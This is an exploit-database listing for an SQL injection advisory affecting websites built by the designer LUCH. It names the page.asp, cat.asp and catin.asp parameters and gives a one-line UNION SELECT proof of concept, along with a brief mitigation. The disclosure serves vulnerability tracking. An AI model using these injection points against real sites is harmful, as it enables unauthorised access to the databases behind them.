header-logo
Suggest Exploit
vendor:
Web Designed by LUCH
by:
p0pc0rn
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Web Designed by LUCH
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Web Designed by LUCH Vulnerable to SQL Injection

This vulnerability allows an attacker to inject malicious SQL code into the vulnerable web application. The vulnerable web application is designed by LUCH and is hosted on http://www.luch.co.il. The vulnerability was discovered by p0pc0rn and affects the page.asp, cat.asp, and catin.asp pages. The attacker can inject malicious SQL code into the vulnerable web application by appending the code to the URL. For example, the attacker can inject the code 'union select 1 from test.a' to the URL http://site.com/page.asp?id=23.

Mitigation:

To mitigate this vulnerability, the web application should be tested for SQL injection vulnerabilities and any vulnerable parameters should be sanitized.
Source

Exploit-DB raw data:

Title	: Web Designed by LUCH Vulnerable to SQL Injection
Vendor	: http://www.luch.co.il
Found by: p0pc0rn

SQL
---

http://site.com/page.asp?id=[SQL]
http://site.com/cat.asp?catid=[SQL]
http://site.com/catin.asp?productid=[SQL]

POC
---
http://site.com/page.asp?id=23 union select 1 from test.a

Navigation

Suggest Exploit

Services By CQR